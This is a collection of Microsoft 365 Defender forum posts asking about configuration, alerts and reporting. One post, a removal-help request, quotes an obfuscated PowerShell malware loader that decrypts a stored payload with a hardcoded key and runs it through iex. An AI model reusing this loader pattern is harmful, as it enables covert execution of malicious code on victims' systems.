Microsoft 365 Defender topics Microsoft 365 Defender topics Wed, 27 Oct 2021 23:28:02 GMT MicrosoftThreatProtection 2021-10-27T23:28:02Z WDAG - Microsoft Defender Application Guard for Office - No Attachment protection <P>After trying on <A href="#" target="_blank" rel="noopener">Reddit</A>, Let's try to find an answers here.&nbsp;</P><P>&nbsp;</P><P>I've enabled Microsoft Defender Application Guard for Office for a few test devices/users in our organisation.</P><P>&nbsp;</P><P>I've used Microsoft Endpoint Manager / Endpoint Security for this:</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-19 201611.png" style="width: 689px;"><img src=";px=999" role="button" title="Screenshot 2021-10-19 201611.png" alt="Enable MDAG for Office (not for Edge)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Enable MDAG for Office (not for Edge)</span></span><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-19 201648.png" style="width: 690px;"><img src=";px=999" role="button" title="Screenshot 2021-10-19 201648.png" alt="Add the network Rules (hidden company specific url parts)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Add the network Rules (hidden company specific url parts)</span></span><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-19 201854.png" style="width: 688px;"><img src="" width="688" height="697" role="button" title="Screenshot 2021-10-19 201854.png" alt="Neutral resources (hidden company url)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Neutral resources (hidden company url)</span></span></P><P>&nbsp;</P><P>This configuration works great for Downloads, but doesn't trigger on opening Outlook attachments.</P><P>&nbsp;</P><P>After a lot of searching, I've found the Microsoft Word Trust Center and the tick for Enable 
Application Guard for Outlook Attachments is off (and greyed out).</P><P>&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-20 152549.png" style="width: 824px;"><img src=";px=999" role="button" title="Screenshot 2021-10-20 152549.png" alt="Enable Application Guard for Outlook Attachments greyed out" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Enable Application Guard for Outlook Attachments greyed out</span></span></P><P>&nbsp;</P><P>How can I make sure this will be turned on?</P><P>&nbsp;</P><P>Related question 2: Is it possible that this is because I have Safe documents on?</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screenshot 2021-10-21 111435.png" style="width: 609px;"><img src=";px=999" role="button" title="Screenshot 2021-10-21 111435.png" alt="Screenshot 2021-10-21 111435.png" /></span></P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Thu, 21 Oct 2021 09:26:51 GMT molislaegers 2021-10-21T09:26:51Z Microsoft Defender Endpoint Application Control Policies <P>Hi all,</P><P>&nbsp;</P><P>I would like to find out if MDE application control is capable of the following and how they can be implemented (Im not expecting all to be answered):-</P><P>&nbsp;</P><UL><LI><P>Monitoring of process launch attempts</P></LI><LI><P>Can processes be block</P></LI><LI><P>Can processes be defined by fingerprint/hash</P></LI><LI><P>Process exclusion based on argument regex string</P></LI><LI><P>File read/create/delete/write attempt monitoring</P></LI><LI><P>Is DLL Load monitoring possible</P></LI><LI><P>Can processes be monitored whilst allowing further rules to be analyzed (continue processing other rules)</P></LI><LI><P>Can log events including severity</P></LI><LI><P>Can notify user of policy actions</P></LI><LI><P>Can processes be monitored based on wildcard expressions</P></LI></UL><P>Any help is much appreciated, thank you.</P> Wed, 20 Oct 2021 
08:08:47 GMT Peter_Lane 2021-10-20T08:08:47Z I am trying to find all occurrences of protected health information (PHI) in Tenant <P>Great content in your Advanced Hunting series.&nbsp; This may be outside of scope but is it possible to scavenge for PHI within Microsoft 365 using Advanced Hunting or might that be a completely different tool set?&nbsp; I do see some information on SensitivityLabel and etc. in DeviceFileEvents; however, we have not yet classified our data yet -- this has to do with preparing to classify by first identifying where sensitive data resides.&nbsp; Thanks!</P> Fri, 15 Oct 2021 20:11:45 GMT This_Guy_be_Me 2021-10-15T20:11:45Z Clone or update Default Alert Policy <P>Hi,</P><P>I'm looking for the best way to extend the email recipients on a default alert policy.</P><P>&nbsp;</P><P>The alert policy is "User restricted from sending email", and the GUI doesn't allow for adding additional email recipients.</P><P>&nbsp;</P><P>Is there a way to clone that policy?&nbsp; I don't see anyway to do that.</P><P>&nbsp;</P><P>How could I create my own version of this policy?&nbsp; I couldn't see how to replicate it.&nbsp; None of the "Activity" options correlate to what's seen on the interface.</P><P>&nbsp;</P><P>I looked at Azure Active Directory to see if there were any audit logs I could pull from there, but again, I don't see anything in AAD that could help correlate.</P><P>&nbsp;</P><P>Ideally I'd like to clone the Alert Policy in Office 365 Security &amp; Compliance, does anyone have any ideas on how to go about this?</P><P>&nbsp;</P><P>Thanks</P><P>Mike</P> Fri, 15 Oct 2021 17:32:29 GMT no-va 2021-10-15T17:32:29Z JCS Enterprises LLC, Copyright license(2021) ,Patrick Rene Guerrero JCS Enterprises LLC<BR />Patrick Rene Guerrero<BR />CEO/OWNER<BR />"Dream It,Believe It,Achieve It"<BR />email:,<BR /><A href="#" target="_blank"></A> Wed, 13 Oct 2021 01:44:53 GMT patrickreneguerrero 2021-10-13T01:44:53Z Trying to suppress an alert, no option 
<P>Hello,</P><P>We have a basic alert in Defender that informs us if a change in email forwarding has been made for a certain level of user. This is important to know, but about 3/4th of these are triggered when our system automatically sets up an email address for a new user, or a user switching departments. These are known and the alerts are just noise. I am looking for a way to auto-resolve these. We were looking at using the suppression rule option, but for these alerts this isn't an option. I think it might have to do with being an informational alert as opposed to a compromise, but we just want to filter out a specific username that indicates it is our internal system.</P><P>&nbsp;</P><P>Does anyone know if a way we can get this done? Is there another option without completely turning off this alert all together?</P><P>&nbsp;</P><P>Thank you</P> Mon, 11 Oct 2021 21:55:22 GMT zrvirgo 2021-10-11T21:55:22Z Microsoft Defender 365 Alert issue <P>Hi,</P><P>&nbsp;</P><P>I need some help clarifying some Logs I'm looking at.</P><P>I got an incident registered on Microsoft 365 Defender, which the source is Endpoint and the incident description is:&nbsp;Successful logon from known brute-force source on one endpoint.</P><P>So I got the investigation package from the machine and found out looking at the Logs that there is a Brute Force attempt, which was successful on one user, from an external IP, which is not even the user which is using the machine usually.<BR />I also got the security log from the machine itself and can see the event ID 4624 on the domain user, with logon type 3 (network logon), from the external IP.<BR />So my question is, being the logon from an external IP, what are the possible circumstances that an external IP is doing a brute force on a specific machine on my network?<BR />Does this mean that this machine is compromised and being used for lateral movement?<BR />Or any other plausible explanation for a network logon being done from an external 
IP?</P><P>&nbsp;</P><P>Thanks</P> Thu, 07 Oct 2021 15:41:19 GMT dmarquesgn 2021-10-07T15:41:19Z Compressed files scan depth <P>Hi everyone,</P><P><A href="#" target="_blank"></A></P><P>&nbsp;</P><P>The documentation for Defender for O365 is a bit vague. I've been looking for an answer, but I hope one of you might have the answer.</P><P>The question is how many layers Defender is able to scan and the answer is "...<SPAN>recursive scanning of compressed files scans many layers deep."</SPAN></P><P>&nbsp;</P><P><SPAN>So how many layers is many&nbsp;<img class="lia-deferred-image lia-image-emoji" src="" alt=":smile:" title=":smile:" /></SPAN></P><P>&nbsp;</P> Fri, 08 Oct 2021 13:43:20 GMT mib76 2021-10-08T13:43:20Z Microsoft 365 Defender integration with Azure Sentinel <P>Hi,</P><P>I understand that this feature is currently in preview, integrating the entire Defender 365 Suite into Sentinel and supporting&nbsp;<SPAN>bi-directionally sync.</SPAN></P><P><SPAN>Prior to this, my understanding was to route all the alerts via MCAS to avoid duplicate ID issues for example with Defender for Identity:&nbsp;</SPAN></P><P><SPAN>************</SPAN></P><P><SPAN>If both your services (Defender for Identity and Cloud App Security) are currently configured to send alert notifications to a SIEM, after enabling Defender for Identity integration in Cloud App Security, you'll start to receive duplicate SIEM notifications for the same alert. One alert will be issued from each service and they'll have different alert IDs. 
To avoid duplication and confusion, decide where you intend to perform alert management, and then stop SIEM notifications being sent from the other service.</SPAN></P><P><SPAN>************</SPAN></P><P><SPAN>Another benefit was with integrating Defender for Endpoint with MCAS to then have the ability for Cloud App Discovery to sanction/un-sanction apps, then there was the integration of Defender for Identity with Defender for Endpoint.</SPAN></P><P>&nbsp;</P><P><SPAN>I guess what I'm trying to work out is that once we start using the new 365 Defender connector to Sentinel, what do we need to change in all the integrations we have setup with all the Defender suite pointing to MCAS?&nbsp;(also data ingestion cost savings come into play, when alerts directed to MCAS first)</SPAN></P><P><SPAN>The only thing I read was that you need to be aware of the incident creation rules and the need to delete them in 365 Defender to avoid duplicates, if also using in Sentinel.</SPAN></P><P>&nbsp;</P><P><SPAN>Secondly, Am I correct to assume that all the 365 Defender Suite alerts will be at no charge?</SPAN></P><P>&nbsp;</P><P><SPAN>Lastly, there is a note on top of all this stating "All Microsoft Cloud App Security alert types are now being onboarded to Microsoft 365 Defender" What would be great is a Best Practice 365 Defender integration guide. As there are so many portals that can be logged into.</SPAN></P><P>&nbsp;</P><P><SPAN>Thanks</SPAN></P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Mon, 04 Oct 2021 14:45:23 GMT AmjadGov 2021-10-04T14:45:23Z How to quickly react to a user reported phishing e-mail? 
<P>When a user reports an e-mail as phishing I receive an alert notification, which leads me to the Incident page in Microsoft 365.</P><P>&nbsp;</P><P>- How can I find similar e-mails on that page in case any other users received the same phsihing mail?</P><P>&nbsp;</P><P>- How can I quickly delete those mails?</P> Thu, 23 Sep 2021 09:42:58 GMT Kiril Valev 2021-09-23T09:42:58Z Understanding the different reports in MDE <P>Hello, I'm new to working in Microsoft Defender and Endpoint and trying to understand some of the reports.&nbsp;<BR /><BR />If I navigate to&nbsp;<A href="#" target="_blank" rel="noopener">Reports - Microsoft 365 security</A>&nbsp;and click on the predefined "Security report" my main questions are under the "Devices" section.&nbsp;<BR /><BR />When I was looking I saw that the report said "Devices with Active Malware" had 1 device with 1 active malware.&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Aireal_2-1632166557440.png" style="width: 400px;"><img src=";px=400" role="button" title="Aireal_2-1632166557440.png" alt="Aireal_2-1632166557440.png" /></span></P><P><BR />But then there is also a part that says "Malware on devices" and there were like 21 line items<BR /><BR /></P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Aireal_3-1632166591122.png" style="width: 400px;"><img src=";px=400" role="button" title="Aireal_3-1632166591122.png" alt="Aireal_3-1632166591122.png" /></span></P><P>&nbsp;</P><P><BR />However, I can't find any more information about the 21 malware items. They don't tell me the device name. 
I'm just confused as to what this is.&nbsp;<BR /><BR /><BR /></P> Tue, 21 Sep 2021 13:44:28 GMT Aireal 2021-09-21T13:44:28Z User restricted from sending email false positive <P>We have an email address that keeps getting blocked from sending emails with the alert saying "<STRONG>User has been restricted from sending messages outside the organization due to potential compromised activity.</STRONG>" This is a false positive and the email address keeps getting blocked after unblocking. What action should I take to not let this happen again without removing protection?</P><P>&nbsp;</P><P>Thank you</P> Wed, 15 Sep 2021 17:14:43 GMT tk298 2021-09-15T17:14:43Z Windows Defender issue <P>I want to open up windows defender but this keeps showing up.</P> Sat, 11 Sep 2021 00:32:36 GMT BLUEMLG 2021-09-11T00:32:36Z Microsoft 365 Defender Portal - ASR Report <P>To whom it may concern,</P><P>&nbsp;</P><P>Somebody high up in Microsoft connected with the above mentioned portal needs to look at the detection process for ASR and the report.</P><P>&nbsp;</P><P>It is inaccurate, and although I have no doubt that the offending ASR rule being vulnerable drivers will eventually be added to SC or the templates within the appropriate sections of MEM or that these can be implemented via ADMX it sort of makes the appropriate section of the MEM portal obsolete, as its not a complete solution.&nbsp;&nbsp;</P><P>&nbsp;</P><P>In fact I would go so far as to say that the Endpoint Security section of MEM is a botch.&nbsp; It is designed for Enterprise but this is not what this post is about, nor the conflicts that may result from the security baselines, SC policies, and so on.&nbsp; Microsoft MEM portal needs some work but that is IMHO.</P><P>&nbsp;</P><P>Please note that I am a hobbyist but I do pay as does everyone for these reports and I have had to go to some lengths to prove that the attached report is incorrect (all my PCs are fully ASR compliant), as I have a script which pulls the ASR 
entries out of the registry, compiles them, and then annotates a file to the PC which I can then pull via live response (yes I am aware of diagnostics - but that only works on corporate devices not BYO).&nbsp; So I know that all 16 rules are applied, no matter the implementation, on all devices whether BYO or corporate.</P><P>&nbsp;</P><P>Even some of the hunting scripts I see that are written by MVP's and those in the pentesting fraternity (blue, red or purple) are incomplete, as they don't fully take into account all the registry entries involved or the various operating systems.&nbsp; In a perfect world every body would be running Windows 10 or soon Windows 11 Enterprise but this is not the case.</P><P>&nbsp;</P><P>Can somebody please fix the ASR Report in M365 Defender Portal to reflect the true nature of endpoints not what is implemented via MSDE controls or to be exact this registry entry,</P><P>&nbsp;</P><P>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager\ASRRules</P><P>&nbsp;</P><P>As I am pretty sure after investing some time, that this is how the report bases its results</P><P>&nbsp;</P><P>I have further work to do on Controlled Folder Access and Windows Defender exemptions but this is well posted about on LinkedIn and other media by people much smarter and with more time than me,</P><P>and I will eventually add more Ninja training to my resume but I appreciate a great deal that Ninja training is even available and the time that must be invested by individuals to make it so.</P><P>&nbsp;</P><P>Thankyou for reading and consider this feedback that I regard highly important in a dangerous world.</P><P>&nbsp;</P><P>Thanks.</P><P>Leon Scott</P><P>(constantly learning, interested and loves IT)</P><P>&nbsp;</P><P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2021-09-12 (2).png" style="width: 999px;"><img src=";px=999" role="button" title="2021-09-12 (2).png" alt="2021-09-12 (2).png" 
/></span></P><P>&nbsp;</P><P>&nbsp;</P><P>&nbsp;</P> Sun, 12 Sep 2021 08:43:43 GMT braedachau 2021-09-12T08:43:43Z Defender outdated client, but correct engine and definitions for latest release <P>Hello,</P><P>After getting access denied to do a GPO backup, then a system restore crashing at restart, and finally the only boot recovery option that worked was Reset,&nbsp; Defender reports&nbsp;Client 4.18.1909.6 even though it was previously Client 4.18.2011.6 before the crash.&nbsp;&nbsp;Engine: 1.1.18500.10 and the current antivirus/antimalware match for the latest version at&nbsp;<A href="#" target="_blank">;view=o365-worldwide</A></P><P>My coworker has the same laptop, and when he updates, he only gets Platform: 4.18.2107.4, instead of the latest Platform: 4.18.2108.7, but engine and definitions are correct.</P><P>&nbsp;</P><P>We are both on Windows 10 version 21H1 Build 19043.1165.</P><P>Windows Security app settings report 10.0.19041.964 for my laptop and .1024 for his.</P><P>&nbsp;</P><P>I used DISM and SFC to correct some files after the reset with an ISO (21H1 Build 19043, but less than 1165).&nbsp; I also applied additional MPAM-FE from&nbsp;<A href="#" target="_blank"></A>&nbsp;, but it did not repair the platform.</P><P>&nbsp;</P><P>I tried the options at</P><P><A href="#" target="_blank"></A></P><P>&nbsp;</P><P>Option 1 and then MPAM-FE.exe update did not fix the platform<BR />Option 2 is only available in Windows 10 Insider Preview Build 20175 or higher</P><P>Option 3 - did not like &amp;, without &amp;, it did not like -Command</P><P>&nbsp;</P><P>Is there another method to reset or reinstall defender?</P><P>Can the appxpackage be reinstalled from the Win10 ISO?</P><P>&nbsp;</P><P>Thank you,</P><P>Nick</P> Fri, 10 Sep 2021 18:21:15 GMT Nickwork 2021-09-10T18:21:15Z URL Clic API for MDO ? 
Hello everyone,<BR />TL;DR : is it a MDO SafeLinks API, or a Microsoft 365 Defender where we can check whether a URL has been clicked or not?<BR /><BR />I'm a security officer, working with Azure sentinel and logic apps. I frequently receive security incidents where I have to investigate if users accessed bad URLs.<BR />I want too automate this a bit and set up a logic app for that.<BR />Do you know if there is any documentation on this (and if this feature is available)? Fri, 10 Sep 2021 05:57:44 GMT jeffazure 2021-09-10T05:57:44Z Need help with suspicious "Behavior:Win32/SuspCopy.B" <P>Hello,</P><P>the system of a colleague is trying to block various attempt of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus block it but after some times it find it again; the threath create a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivurs find a new attempt, a pop up shows that a particular .tmp files is not found: the pop up is a wsh pop up and I suppose a vbscript is executed when there is this issue.</P><P>One of the file that I have found is a powershell script like this:<BR /><BR /></P><LI-CODE lang="powershell">try{Import-Certificate:Import-StartLayout Get-PSSessionConfiguration:Import-BinaryMiLog Unregister-UevTemplate:Set-AppvPublishingServer}catch{ $kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi"; try{Add-AppxPackage:Enable-PSBreakpoint Invoke-CommandInDesktopPackage:Get-RunspaceDebug Clear-UevConfiguration:Debug-Process}catch{} $NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"}; if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){ $pAWzZWnnbaODWSIlGcI=@(1..16); $wXXale=[System.Runtime.InteropServices.Marshal] $FJZARstrPhaUvJ= Get-Content "" 
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI; $qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu); try{Show-EventLog:Get-WheaMemoryPolicy Get-NonRemovableAppsPolicy:Set-AppLockerPolicy Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';} $zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW); try{Write-Host:Publish-AppvClientPackage Set-LocalUser:Invoke-WmiMethod Set-WmiInstance:New-WindowsImage}catch{} $zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}</LI-CODE><P>I also tried to do a scan with Microsoft Security Scanner but without a success.</P><P>Has someone any idea how I could eradicate this threath?</P><P>&nbsp;</P><P>--</P><P>Regards</P> Wed, 08 Sep 2021 14:07:36 GMT Marco Mangiante 2021-09-08T14:07:36Z 'Zero Width Space' appended to Microsoft 365 Defender Alert <P>TLDR:&nbsp;The M365 Defender alert "Email messages containing malicious URL removed after delivery" has a hidden non-printable character at the end of the alert, the Zero-Width Space (ZWSP) character.</P><P>&nbsp;</P><P>I was working to implement the SocRA Watchlist by&nbsp;<LI-USER uid="512377"></LI-USER>&nbsp;in Sentinel and was eager to extend the included list with a few simple remediation steps. Luckily for this post the very first alert I chose to extend has a hidden non-printable character, the Zero-Width Space (ZWSP) character.</P><P>&nbsp;</P><P>After significant head scratching on why my watchlist was not triggered for the alert I found that: "Email messages containing malicious URL removed after delivery​"&nbsp;<SPAN>has the non-printable character after the 'y' in delivery. 
I have copied the alert title in both Chrome and Edge as well as 2 Azure tenants and the ZWSP character is consistent.</SPAN></P><P>&nbsp;</P><P><SPAN>You can test this yourself by searching for the alert and copying the full title and running the below code which converts the string to its decimal unicode equivalent:</SPAN></P><P>&nbsp;</P><LI-CODE lang="powershell">$string = "Email messages containing malicious URL removed after delivery​" $string -split '' | %{[int][char]$_}</LI-CODE><P>&nbsp;</P><P>You should see the final output&nbsp; as below:</P><P>&nbsp;</P><LI-CODE lang="powershell">101 114 121 8203</LI-CODE><P>&nbsp;</P><P>The '8203' being the ZWSP character where '121' is 'y'.&nbsp;</P><P>&nbsp;</P><P>It would be great to have this confirmed by other users and remediated by the relevant MS team. While knowing about it one can simply include the ZWSP in relevant watchlists or automation it's going to bite at some point.</P><P>&nbsp;</P><P>Thanks.</P> Wed, 08 Sep 2021 05:07:23 GMT UCDWraith 2021-09-08T05:07:23Z Splunk integration ATP Defender <P>Hello,</P><P>we are looking at Microsoft 365 ATP Defender and we are struggling with the integration with Splunk due some missing fields in the logs, did anyone was succesful to do this?</P><P>Thank you!<BR />RS</P> Tue, 07 Sep 2021 12:29:45 GMT rs8091 2021-09-07T12:29:45Z How to block a file type? 
<P>I am looking to block the download of certain type, namely APK files.<BR /><BR />Is there a way to block files in Defender?</P> Tue, 24 Aug 2021 14:16:33 GMT Mattsharkey 2021-08-24T14:16:33Z Microsoft 365 Defender Pop Up <P>Microsoft 365 Defender Pop Up</P><P>&nbsp;</P><P>Is their a way to disable the pop up on&nbsp;Microsoft 365 Defender Cloud Portal.</P><P>&nbsp;</P><P>Everytime I login I have to click through or close whats new in&nbsp;Microsoft 365 Defender</P><P>&nbsp;</P><P>I looked for a setting, but unable to find the disable feature on new features and the click through and closes.</P> Mon, 16 Aug 2021 16:19:07 GMT roger_jr 2021-08-16T16:19:07Z Microsoft Secure Score - Recently introduced issues <P>Hi,</P><P>&nbsp;</P><P>With the recent updates to&nbsp;Microsoft 365 Defender (<A href="#" target="_blank"></A>&nbsp;we have noticed Edge critical updates are no longer being flagged on the "Exposure score over time".&nbsp; Also at the same time this started to occur all devices are showing two Edge entries under the device "Software Inventory" tab (old and newly installed version) and it's now taking three to five days to process (remove old\process new) and mark this devices as updated. In the past the two versions showed for a maximum of 24 hours (at the quickest they cleared within 4 hours), this is now three to five days.&nbsp;&nbsp;</P><P>&nbsp;</P><P>We have also noted the three newly added Teams Security Score checks have not been synced since&nbsp;<SPAN>7/30/2021. Prior to the new items being added the one Teams improvement (Restrict anonymous users from starting Teams meetings) was being scanned every 24 to 48 hours. 
As of this post its now 9 days since the last scan.</SPAN></P><P>&nbsp;</P><P><SPAN>I hoping we can speak with someone from the MS Security Team as we have just about maxed out the security score and security recommendations&nbsp;and we have noted a very large number of bugs.</SPAN></P><P>&nbsp;</P><P><SPAN>Thanks,</SPAN></P><P>&nbsp;</P><P><SPAN>Gary</SPAN></P> Sun, 08 Aug 2021 07:04:45 GMT GaryCutri 2021-08-08T07:04:45Z Need to check upload activity from edge <P>Hi Team&nbsp;</P><P>&nbsp;</P><P>I'm trying to monitor all the upload activity from the edge browser to another Cloud.&nbsp;</P><P>&nbsp;</P><P>Can it be possible to check via advance hunting query&nbsp;@</P> Fri, 06 Aug 2021 07:18:22 GMT Nayan007 2021-08-06T07:18:22Z I have no permission to view Firewall report <P>Hi<BR />I am trying to test <A title="Host firewall reporting in Microsoft Defender for Endpoint" href="#" target="_blank" rel="noopener">Host firewall reporting in Microsoft Defender for Endpoint</A>&nbsp;function.</P><P>&nbsp;</P><P>First, I enable "Audit Filtering Platform Packet Drop" and "Audit Filtering Platform Connection" events.</P><P>After it, when I open&nbsp;<A href="#" target="_blank" rel="noopener">firewall report pages</A>, it tell me "Sorry, you have no permission to view it."</P><P>&nbsp;</P><P>I am Security admin, Security reader, Security operator already.</P><P>What permission I have?</P> Thu, 05 Aug 2021 06:35:54 GMT KevinLin 2021-08-05T06:35:54Z Azure AD Registered Device Showing as vulnerable in Defender Portal ( <DIV class="bi6gxh9e"><DIV class="_1mf _1mj"><SPAN>Hi </SPAN><SPAN>All</SPAN><SPAN>&nbsp;</SPAN></DIV></DIV><DIV class="bi6gxh9e"><DIV class="_1mf _1mj"><SPAN>We have some devices showing in our Defender Endpoints portal ( that are not enrolled in our Intune environment. 
I am wondering </SPAN></DIV></DIV><OL class="kvgmc6g5 cxmmr5t8 oygrvhab hcukyx3x jb3vyjys rz4wbd8a qt6c0cv9 a8nywdso"><LI><DIV class="_1mf _1mj"><SPAN>Why is the device showing in the Defender portal? The device is Azure AD Registered but not MDM enroled.</SPAN></DIV></LI><LI><DIV class="_1mf _1mj"><SPAN>How do we remove the device from showing in this portal safely without removing it from Azure AD?</SPAN></DIV></LI></OL><DIV class="bi6gxh9e"><DIV class="_1mf _1mj"><SPAN>Thanks </SPAN></DIV></DIV> Wed, 04 Aug 2021 15:17:31 GMT ICB2022 2021-08-04T15:17:31Z Identify a device on Device Inventory <P>Hi,</P><P>My team members installed Microsoft Defender for Endpoint for each PC (Windows / Mac ).</P><P>I can see most devices on the page 'Device inventory' in Microsoft Defender Security Center <A href="#" target="_blank"></A>.</P><P>&nbsp;</P><P>But some PCs have the same device name such as "Windows 10" or "MacBook-Pro" and also "Logged on users" the username does not appear. As a result, it is not possible to determine which PC is being used by whom. The Device Inventory does not show the serial number of the device, so I have no other way to distinguish between them.</P><P>&nbsp;</P><P>Do I have to buy MS Intune license to distinguish them?</P><P>Is there any way to identify each PC ?</P><P>Best regards,</P> Thu, 17 Jun 2021 07:32:02 GMT tarosrcm 2021-06-17T07:32:02Z Can we change severity of "Detection Source" in microsoft atp <P>Hi Guys,</P><P>Can we change severity of "Detection Source" in microsoft atp.</P><P>Example: for any custom detection rule I can set severity by editing the detection rule. 
can we change the same for alert triggered by detection source like antivirus</P> Fri, 09 Jul 2021 12:38:57 GMT Sheri97 2021-07-09T12:38:57Z Unsupported alerts <P>Can anyone tell me why the Investigation state for some alerts from MCAS show up in M365 Defender as "unsupported alerts" ?</P> Wed, 14 Jul 2021 11:01:36 GMT Dean Gross 2021-07-14T11:01:36Z Disassociate a incorrectly linked set of alerts that forma an incident <P>Morning all&nbsp;</P><P>In M365D - when a series of alerts create two distinct incidents - there is clearly a way of adding "linked incidents" to an existing incident - is there a way of Un-Linking or Disassociating an incorrectly linked set of alerts that form an incident.&nbsp; &nbsp; See image attached.&nbsp; many thanks&nbsp;</P> Thu, 08 Jul 2021 09:01:36 GMT wootts 2021-07-08T09:01:36Z Review Allowed/blocked IP List Items <P>After we have added IP addresses to the list, how can we review what is in that list? Where is the data stored?</P> Tue, 22 Jun 2021 12:37:46 GMT Dean Gross 2021-06-22T12:37:46Z Getting issue on fqdn confirmation <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="sprazapati_0-1624346518744.png" style="width: 400px;"><img src=";px=400" role="button" title="sprazapati_0-1624346518744.png" alt="sprazapati_0-1624346518744.png" /></span></P><P>&nbsp;</P> Tue, 22 Jun 2021 07:22:25 GMT sprazapati 2021-06-22T07:22:25Z How to migrate mailboxes in hybrid environment <P>I have configure Azure AD connect and Hybrid wizard. 
After that what are the step that for migrate the mailboxes.</P> Mon, 21 Jun 2021 18:43:47 GMT sprazapati 2021-06-21T18:43:47Z Web content filter or Web protection <P>Hi,</P><P>I am looking for a way to report on web browsing activity on a user level in Microsoft defender security center Web Protection.</P><P>Has anyone achieved this successfully?&nbsp; ie reporting on per user web browsing activity?</P><P>Thank you in advance.</P> Mon, 14 Jun 2021 14:56:37 GMT KojoOsiris 2021-06-14T14:56:37Z Adding custom Threat Intelligence feeds to M365 Defender <P>Are there any methods for adding TI feeds to M365 like we can do for Azure Sentinel?</P> Thu, 10 Jun 2021 15:48:08 GMT Dean Gross 2021-06-10T15:48:08Z Tutorials for Defender products <P>There is a series of tutorials for conducting investigations for Defender for Identity,&nbsp;<A href="#" target="_blank">Microsoft Defender for Identity reconnaissance phase security alerts | Microsoft Docs</A>&nbsp;that are very helpful. I really like the way that the information is presented and suggested remediation steps are provided.&nbsp;</P><P>&nbsp;</P><P>The MDI approach seems easier to follow that the investigation instructions provided for Defender for Office 365&nbsp;<A href="#" target="_blank">Investigate malicious email that was delivered in Office 365, Find and investigate malicious email - Office 365 | Microsoft Docs</A> and Defender for Endpoint&nbsp;<A href="#" target="_blank">Investigate incidents in Microsoft Defender for Endpoint | Microsoft Docs</A></P><P>&nbsp;</P><P>What do other people think?</P><P>&nbsp;</P><P>&nbsp;<LI-USER uid="63582"></LI-USER>&nbsp;it would be great if the MDO and MDE teams could use the same approach as MDI</P> Sat, 29 May 2021 20:38:30 GMT Dean Gross 2021-05-29T20:38:30Z KQL Date between range not working <P>Due to the 10,000 row limit within KQL, we are working with running scan for just specific time ranges.&nbsp;&nbsp;</P><P>&nbsp;</P><P>Query:&nbsp;</P><P>IdentityLogonEvents</P><P>| 
where LogonType == "Failed logon" and isnotempty(AccountName)</P><P>| project LogonTime = Timestamp, LogonType, Application, FailureReason, AccountName, AccountUpn, DeviceName, DestinationDeviceName</P><P>| where Timestamp between (datetime(2021-5-02)..datetime(2021-5-03))</P><P>&nbsp;</P><P>However, the datetime is not working correctly; we still get whatever option is selected in the GUI.&nbsp; When I test this in the lademo area, I get "Set in query".&nbsp;&nbsp;</P><P>&nbsp;</P><P>Any help/advice on how to get the date range to work in the query?</P><P>&nbsp;</P><P>Also, it's odd how the 10,000 limit is not in a row.&nbsp; For example, if we did 5/5 - 5/8 and we limited out, we will get results for all dates but not all the data.</P><P>&nbsp;</P><P>Cheers,</P> Wed, 19 May 2021 16:01:51 GMT snteran 2021-05-19T16:01:51Z Announcing an important behavior change for MDE's Endpoint Discovery <DIV class="lia-message-body lia-component-message-view-widget-body lia-component-body-signature-highlight-escalation lia-component-message-view-widget-body-signature-highlight-escalation"><DIV class="lia-message-body-content"><P>On April 6th we announced the public preview of Endpoint Discovery, which enables Microsoft Defender for Endpoint to discover unmanaged workstations, servers and mobile devices (Windows, Linux, macOS, iOS, and Android) on their business networks. Based on customer feedback we are switching the discovery functionality from a passive to active mode on Monday May 10th. This will enable Endpoint Discovery to automatically discover a more complete inventory of unmanaged endpoints.</P><P>&nbsp;</P><P>With this change there are two matters that public preview customers may experience. The first is related to the discovery of a potentially much larger inventory of unmanaged endpoints. 
